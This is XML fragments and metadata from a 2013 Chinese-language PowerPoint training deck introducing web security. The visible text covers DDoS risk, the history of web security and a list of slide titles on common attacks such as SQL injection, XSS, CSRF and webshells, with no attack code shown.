        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="207513369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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>站点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击风险</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1340768"/>
            <a:ext cx="8229600" cy="4752528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击造成的后果正如其名字，会使服务器瘫痪，拒绝再向用户提供正常服务，关于这方面最好的例子就是铁道部的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>12306</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="286143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457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>总结</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42074960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总结</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>介绍了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>安全的发展史</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>介绍了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>安全的渗透测试框架</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>介绍了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>常见</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>安全问题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29615729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安全的成熟</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>伴随着</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web2.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的兴起，像</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>安全问题如雨后春笋般冒出并变得更为强大，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击的思路也从服务器转向了客户端。黑客们天马行空的思路，覆盖了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的每一个环节，变得更加多样化，这也促使</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>安全走向成熟。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25207820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457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>渗透</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>测试框架</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="401743014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主题">
      <a:majorFont>
        <a:latin typeface="Calibri"/>
        <a:ea typeface="PMingLiU"/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Calibri"/>
        <a:ea typeface="PMingLiU"/>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11706</TotalTime>
  <Pages>0</Pages>
  <Words>3024</Words>
  <Characters>0</Characters>
  <Application>Microsoft Office PowerPoint</Application>
  <DocSecurity>0</DocSecurity>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Lines>0</Lines>
  <Paragraphs>376</Paragraphs>
  <Slides>74</Slides>
  <Notes>64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74</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="76" baseType="lpstr">
      <vt:lpstr>1_Office 主题</vt:lpstr>
      <vt:lpstr>Visio</vt:lpstr>
      <vt:lpstr>Web安全介绍</vt:lpstr>
      <vt:lpstr>培训提纲</vt:lpstr>
      <vt:lpstr>Web安全的兴起</vt:lpstr>
      <vt:lpstr>Web安全的早期</vt:lpstr>
      <vt:lpstr>Web安全的孕育</vt:lpstr>
      <vt:lpstr>Web安全的发展</vt:lpstr>
      <vt:lpstr>Web安全的里程碑</vt:lpstr>
      <vt:lpstr>Web安全的成熟</vt:lpstr>
      <vt:lpstr>Web渗透测试框架</vt:lpstr>
      <vt:lpstr>Web渗透攻击框架图</vt:lpstr>
      <vt:lpstr>概述</vt:lpstr>
      <vt:lpstr>Web渗透识别与分析阶段</vt:lpstr>
      <vt:lpstr>简介</vt:lpstr>
      <vt:lpstr>信息收集与网站内容分析</vt:lpstr>
      <vt:lpstr>信息收集与网站内容分析</vt:lpstr>
      <vt:lpstr>信息收集与网站内容分析</vt:lpstr>
      <vt:lpstr>信息收集与网站内容分析</vt:lpstr>
      <vt:lpstr>网站配置管理测试</vt:lpstr>
      <vt:lpstr>网站配置管理测试</vt:lpstr>
      <vt:lpstr>网站配置管理测试</vt:lpstr>
      <vt:lpstr>网站配置管理测试</vt:lpstr>
      <vt:lpstr>网站配置管理测试</vt:lpstr>
      <vt:lpstr>网站配置管理测试</vt:lpstr>
      <vt:lpstr>网站配置管理测试</vt:lpstr>
      <vt:lpstr>Web渗透攻击探测阶段</vt:lpstr>
      <vt:lpstr>简介</vt:lpstr>
      <vt:lpstr>访问控制测试</vt:lpstr>
      <vt:lpstr>访问控制测试-认证测试</vt:lpstr>
      <vt:lpstr>访问控制测试-认证测试</vt:lpstr>
      <vt:lpstr>访问控制测试-认证测试</vt:lpstr>
      <vt:lpstr>访问控制测试-认证测试</vt:lpstr>
      <vt:lpstr>访问控制测试-会话管理测试</vt:lpstr>
      <vt:lpstr>访问控制测试-授权测试</vt:lpstr>
      <vt:lpstr>参数过滤测试- SQL注入</vt:lpstr>
      <vt:lpstr>参数过滤测试-XSS测试</vt:lpstr>
      <vt:lpstr>参数过滤测试-其它注入测试 </vt:lpstr>
      <vt:lpstr>参数过滤测试-其它注入测试</vt:lpstr>
      <vt:lpstr>参数过滤测试-PHP特有攻击测试 </vt:lpstr>
      <vt:lpstr>参数过滤测试-文件上传测试</vt:lpstr>
      <vt:lpstr>逻辑功能测试 </vt:lpstr>
      <vt:lpstr>阻断服务测试   </vt:lpstr>
      <vt:lpstr>Web服务测试-Web服务     </vt:lpstr>
      <vt:lpstr>Web服务测试-Ajax测试     </vt:lpstr>
      <vt:lpstr>Web常见安全问题</vt:lpstr>
      <vt:lpstr>SQL注入攻击原理</vt:lpstr>
      <vt:lpstr>SQL注入攻击案例</vt:lpstr>
      <vt:lpstr>SQL注入攻击风险</vt:lpstr>
      <vt:lpstr>XSS注入攻击原理</vt:lpstr>
      <vt:lpstr>XSS注入攻击案例-反射型</vt:lpstr>
      <vt:lpstr>XSS注入攻击案例-基于DOM型</vt:lpstr>
      <vt:lpstr>XSS注入攻击案例-存储型</vt:lpstr>
      <vt:lpstr>XSS注入攻击风险</vt:lpstr>
      <vt:lpstr>CSRF攻击原理</vt:lpstr>
      <vt:lpstr>CSRF攻击案例</vt:lpstr>
      <vt:lpstr>CSRF攻击风险</vt:lpstr>
      <vt:lpstr>会话固定攻击原理</vt:lpstr>
      <vt:lpstr>会话固定攻击案例</vt:lpstr>
      <vt:lpstr>会话固定攻击风险</vt:lpstr>
      <vt:lpstr>PHP文件包含漏洞原理</vt:lpstr>
      <vt:lpstr>PHP本地文件包含案例</vt:lpstr>
      <vt:lpstr>PHP远程文件包含案例</vt:lpstr>
      <vt:lpstr>PHP变量覆盖原理</vt:lpstr>
      <vt:lpstr>PHP变量覆盖案例</vt:lpstr>
      <vt:lpstr>PHP变量覆盖风险</vt:lpstr>
      <vt:lpstr>WebShell网页木马原理</vt:lpstr>
      <vt:lpstr>WebShell一句话木马案例</vt:lpstr>
      <vt:lpstr>WebShell大马案例</vt:lpstr>
      <vt:lpstr>WebShell网页木马风险</vt:lpstr>
      <vt:lpstr>Web站点DDOS攻击原理</vt:lpstr>
      <vt:lpstr>Web站点DDOS攻击案例</vt:lpstr>
      <vt:lpstr>Web站点DDOS攻击风险</vt:lpstr>
      <vt:lpstr>总结</vt:lpstr>
      <vt:lpstr>总结     </vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Microsoft Corporation</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Company</dc:title>
  <dc:creator>zx</dc:creator>
  <cp:lastModifiedBy>zx</cp:lastModifiedBy>
  <cp:revision>1019</cp:revision>
  <cp:lastPrinted>1899-12-30T00:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-02-02T08:35:21Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-01-22T09:24:47Z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